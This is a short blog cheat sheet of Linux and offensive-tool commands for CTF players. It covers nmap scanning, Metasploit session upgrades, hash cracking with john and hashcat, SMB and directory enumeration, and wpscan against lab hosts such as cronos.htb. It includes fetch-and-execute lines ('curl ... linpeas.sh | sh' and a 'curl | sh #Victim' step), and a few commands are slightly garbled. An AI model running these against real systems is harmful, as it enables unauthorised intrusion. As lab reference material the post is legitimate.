· Abhinav Kumar · Hacking 101  · 2 min read

Linux Commands for Hacking and Security

Linux commands and shortcuts very often used by Hackers, Security professionals, CTF Players.

Linux commands and shortcuts very often used by Hackers, Security professionals, CTF Players.

Linux commands that are often used by hackers, security professional and CTF players. We will avoid any payloads or oneliner exploits ( will cover in different page sometime). Updated - October 02, 2023.

Table of Contents

Add Target to hosts file

└─$ echo ' blue.thm' | sudo tee -a /etc/hosts
[sudo] password for abhinav: blue.thm


#for TCP Scan
sudo nmap -sC -sV -p- -T5 -Pn targethost

#for UDP Scan
sudo nmap -sU -sV -p- -T5 -Pn targethost

# Store scan results for ports separated by comma.
└─$ ports=$(nmap -p- --min-rate=1000 -T4 cronos.htb | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')

# Check which ports are found
└─$ echo $ports

# Pass the information in -p argument as $ports
└─$ sudo nmap -sC -sV -A -O -T5 -p$ports cronos.htb


Start Metasploit with database

# Pass the information in -p argument as $ports
└─$ systemctl start postgresql

└─$ msfdb init
Creating database user 'msf'
Enter password for new role:
Enter it again:
Creating databases 'msf' and 'msf_test'
Creating configuration file in /usr/share/metasploit-framework/config/database.yml
Creating initial database schema

Metasploit Shell Upgrade to Meterpreter

sessions -u 3
sessions -u -1
use post/multi/manage/shell_to_meterpreter
run session=-1

Cracking hash with John

└─$ john hash --format=NT --wordlist=/usr/share/wordlists/rockyou.txt 

Cracking hash with hashcat

Windows NTLM Hash

hashcat -m 1000 -a 0 hash /usr/share/wordlists/rockyou.txt.gz

Extract Files

Gz Files

gunzip archive.gz

tar Files

tar –xvzf archive.tar.gz

SSH Connection

ssh username@host -oHostKeyAlgorithms=+ssh-dss

Text Filter

grep -i #]- inlcude
grep -v #]- exclude

SMB Enumeration


nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse target_HOST
smbclient //IP/directory

Mount NFS Share

make directory locally and mount it

mkdir /mnt/sampleDIR
sudo mount IP:/folder /mnt/sampleDIR


get version via banner

nc IP port


From github

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

Python Simple HTTP Server

python3 -m http.server 7777
curl | sh #Victim

Wordpress CMS Vulnerabilty Scanning

wpscan --url https://brainfuck.htb --disable-tls-checks

Directory Enumeration

└─$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://cronos.htb/FUZZ -mc 200,403 -c -t 400

└─$ gobuster dir -u  http://cronos.htb/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --threads 200 --quiet

Reading a File

head -20 filepathandname
tail filename
tail -20 filename
cat filename | grep "word_to_filter"

Replace in File

sed /s/wordtoreplace/wordtoreplacewith/g /filepath > outputfilepath
    Back to Blog

    Related Posts

    View All Posts »